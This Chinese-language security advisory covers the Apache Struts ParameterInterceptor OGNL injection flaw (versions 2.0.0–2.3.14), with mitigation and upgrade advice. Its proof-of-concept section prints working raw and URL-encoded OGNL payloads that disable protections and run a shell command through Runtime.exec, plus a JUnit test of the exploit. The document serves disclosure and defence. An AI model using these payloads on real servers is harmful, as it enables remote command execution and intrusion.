Apache Struts “ParameterInterceptor”安全绕过漏洞

发布日期:2013-05-22
更新日期:2013-05-23

受影响系统:
Apache Group Struts 2.0.0 - 2.3.14
描述:
--------------------------------------------------------------------------------
Apache Struts是一款开发Java web应用程序的开源Web应用框架。
 
Apache Struts 2.3.14.1之前版本在"ParameterInterceptor"类的实现上存在错误,可被利用修改服务器端对象,也可以通过特制的OGNL表达式绕过ParametersInterceptor及OGNL库保护,从而达到执行任意命令的目的。
 
<*来源:Xgc Kxlzx
 
  链接:http://secunia.com/advisories/53495/
        http://struts.apache.org/development/2.x/docs/s2-012.html
        http://struts.apache.org/development/2.x/docs/s2-013.html
        http://www.freebuf.com/vuls/9757.html
        http://struts.apache.org/development/2.x/docs/security-bulletins.html
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Proof of concept
 Vulnerable Action
 public class FooAction {
    private String foo;
 
    public String execute() {
        return "success";
    }
    public String getFoo() {
        return foo;
    }
 
    public void setFoo(String foo) {
        this.foo = foo;
    }
 }
 
Here's an actual decoded example, which will create /tmp/PWNAGE directory:
 
/action?foo=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Runtime@getRuntime().exec('mkdir /tmp/PWNAGE'))(meh)&z[(foo)('meh')]=true
 encoded version:
 
/action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27mkdir%20/tmp/PWNAGE%27%29%29%28meh%29&z[%28foo%29%28%27meh%27%29]=true
 And the JUnit version
 
PoC
 public class FooActionTest extends org.apache.struts2.StrutsJUnit4TestCase<FooAction> {
    @Test
    public void testExecute() throws Exception {
        request.setParameter("foo", "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new " +
                "java.lang.Boolean(false), #_memberAccess[\"allowStaticMethodAccess\"]= new java.lang.Boolean(true), " +
                "@java.lang.Runtime@getRuntime().exec('mkdir /tmp/PWNAGE'))(meh)");
 
        request.setParameter("top['foo'](0)", "true");
 
        String res = this.executeAction("/example/foo.action");
        FooAction action = this.getAction();
 
        File pwn = new File("/tmp/PWNAGE");
        Assert.assertFalse("Remote exploit: The PWN folder has been created", pwn.exists());
    }
 }

建议:
--------------------------------------------------------------------------------
临时解决方法:
 
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
 
* 配置struts.xml内的ParametersIntercptor,以排除恶意参数。此外正确应用下面的interceptor-ref配置,就可以仅允许简单导航表达式:
 <interceptor-ref name="params">
    <param name="acceptParamNames">\w+((\.\w+)|(\[\d+\])|(\['\w+'\]))*</param>
 </interceptor-ref>
 
厂商补丁:
 
Apache Group
 ------------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载 Struts 2.3.1.2:
 
http://struts.apache.org/download.cgi#struts2312

相关推荐